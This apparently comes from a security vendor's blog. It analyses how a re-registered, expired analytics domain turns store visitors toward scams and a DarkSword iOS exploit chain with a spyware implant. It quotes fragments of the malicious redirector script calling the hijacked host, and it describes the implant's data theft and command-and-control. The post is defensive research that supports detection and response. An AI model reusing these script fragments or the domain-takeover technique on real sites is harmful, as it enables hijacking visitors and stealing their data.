Abandoned Analytics Domain Funnels Store Visitors to DarkSword iPhone Exploits
A defunct e-commerce analytics startup let its domain expire and someone re-registered it. With the tag still sitting on online stores, it now hijacks visitors, sells them on to ad networks, and in one case, it delivers a full iOS exploit chain and spyware implant.
The issue is that every third-party script you load is a promise from someone else that the code on the other end will stay as the code you agreed to. If the owner of the domain doesn't keep paying for it, all bets are off.
A startup's expired domain
ecomtrack.io was an e-commerce analytics product from a Czech startup, and like most analytics products, you installed it by dropping a tag into your site's <head>:
<script async src="https://api.ecomtrack.io/v1/tag/script?id=91ec21e4&p=1&v=2.3.0"></script>
The underlying company and product went away, but the tag sitting on your site didn't. It was still sitting in the theme of stores that had long since stopped thinking about it. On 15 September 2026 the domain was re-registered by someone else after it expired, and that tag started serving something very different.
Stage 1: a redirector that doesn't want to be found
The new script is about 2KB in size and pulls all of the usual tricks to avoid being detected. It has measures to detect bots crawling the site it is present on, tries to identify headless browsers, and cloaks itself when it identifies one of a long list of crawlers. For anyone that looks like a viable target, it gathers a bunch of data about the device and POSTs it back to the server:
x.open("POST", "https://api.ecomtrack.io/index.php?cs=…", true);
// …
if (!j || typeof j.fw !== "string" || !/^https?:\/\//.test(j.fw)) return;
navigate(j.fw); // attempts top-level navigation via top.location.replace()
The server then has a bunch of detection logic that we haven't fully mapped out, but in some cases it will return a payload, and in many cases it will return nothing, choosing to have no impact. In our testing, datacentre and VPN IPs consistently received empty responses. Some clients using residential IPs received a payload on their first request, followed by empty responses on subsequent requests.
The same kit, on the same server, is also running from sdk.araleads.com, another dead lead-gen SDK that was re-registered in August, and from getmanyme.com, which is being injected into hacked WordPress sites. This isn't one opportunistic domain grab, this operator is collecting dead domains and turning them into traffic.
Stage 2: selling your visitors
The fw URL is returned in the above POST response and bounces through a meta refresh with no-referrer set, presumably to hide where the visit came from, and lands on a traffic broker: life4life.org or shoppiing.org that I've seen so far. Both are old, dead domains, re-registered at the same registrar and set up the same way. Scanners and crawlers get sent to a random YouTube video or google.com, while those identified as 'real' visitors get sold.
So far we're up to three different buyers on the other end:
- a German "market news" investment-scam page, via
pushub.net - an online casino, via
mercu-wgp.com chainmate.top, a slick fake "AI crypto quant trading" site, viaadv.realsh.xyz
That last one is where things really kicked up a gear.
Stage 3: an iPhone exploit chain
chainmate.top quietly loads a hidden page from zhengxin021.top and that page checks whether you're in Safari on iOS 18.4.0 to 18.7.2 and, if you match, loads the exploit chain without requiring any further interaction. That's the loader's targeting range, rather than a range we've confirmed is exploitable: Google reports that two later-stage vulnerabilities used by DarkSword were patched in iOS 18.7.2, and we haven't tested this recovered chain against real iPhones.
This isn't a new exploit, it's DarkSword, the iOS 18 chain that Google Threat Intelligence, Lookout and iVerify documented in March. It chains six vulnerabilities and has already been used by spyware vendors and a suspected state actor.
- The implant matches Google's published hunting rule for DarkSword's implant libraries and contains matching source-path artefacts, including
src/libs/TaskRop/PAC.jsandsrc/MigFilterBypassThread.js. The rule is a broad hunting aid, so we considered this alongside the other code matches. - One module contains the same unused helper Google documented: a function called
dummyythat formats a value as hexadecimal. - The recovered modules follow the same exploit-stage structure described in Google's analysis. Together, these matches underpin our identification of the chain as DarkSword.
From the files we were able to recover and analyse, the chain is:
- Remote code execution in Safari's JavaScript engine. There are separate modules for each band of iOS versions, and memory offsets for 26 iPhone models, from the XS through the 16.
- Escape from Safari's sandbox into the GPU process, and from there into
mediaplaybackdbefore a kernel exploit. - An implant that hijacks
securitydand uses the device's key store to decrypt the keychain.
The recovered implant appears to differ from the three payload families Google documented: GHOSTBLADE, GHOSTKNIFE and GHOSTSABER. Unlike GHOSTBLADE, Google's data stealer, it includes a remote-control backdoor. Backdoor functionality alone doesn't establish that it's a different family, though, because GHOSTKNIFE and GHOSTSABER also have those capabilities, and we haven't found infrastructure overlap with the campaigns in Google's report either. The crypto lure and brokered traffic suggest a financially motivated campaign, although we haven't attributed it to a specific operator.
This implant is built to go after:
- SMS, contacts, call history and voicemail
- photos, Health data, location history and notifications
- saved Wi-Fi passwords
- wallet files for more than 25 crypto apps, including MetaMask, Trust Wallet, Phantom, Coinbase Wallet, OKX, Binance and imToken
The recovered code is configured to contact mertio.cc every 30 seconds and handle commands including exec, download, photos and spy. The crypto-trading lure and wallet collection capabilities suggest a financial motive and we're happy to share the recovered samples with researchers interested in taking the analysis further.
What should you do?
Audit what script tags are loading on your site! Any tag that is no longer being actively used or providing value is a potential risk. The third-party hosting the code could be compromised and deliver malicious code, or as we've seen here, the domain could lapse and be taken over by attackers to serve malicious code.
Any script tag that is not required should be removed to reduce risk, and we have the tooling to make it easy. Our JavaScript Integrity Monitoring suite can not only audit every single script running on your site to provide a complete list, it can also cryptographically fingerprint those scripts and detect when any of them change.
You can start a 30-day free trial, with no credit card required, and start receiving data in minutes with no code to deploy. Get Started Now →
IOCs
*.ecomtrack.io dead analytics tag, re-registered 2026-09-15
*.araleads.com dead SDK, re-registered 2026-08-25
*.getmanyme.com injected into hacked WordPress sites
*.life4life.org traffic broker
*.shoppiing.org traffic broker
*.realsh.xyz ad redirect to the exploit page
*.chainmate.top fake crypto lure page
*.zhengxin021.top DarkSword exploit kit; loader targets iOS 18.4–18.7.2
*.mertio.cc implant command-and-control
139.59.160.219 stage 1 redirector serverCredit
I want to say thanks and give a hat tip to Michal Špaček, Head of Security at Shoptet and ex-Report URI team member, for contributing to this research 👍
Update, 9 October 2026: Since publishing, we've matched the implant to P7 DarkSword, a variant that iVerify documented on 8 October. Two of its embedded modules are byte-for-byte identical to iVerify's samples. The build we recovered appears to newer (v24), and it reports to different infrastructure and targets far more crypto wallets.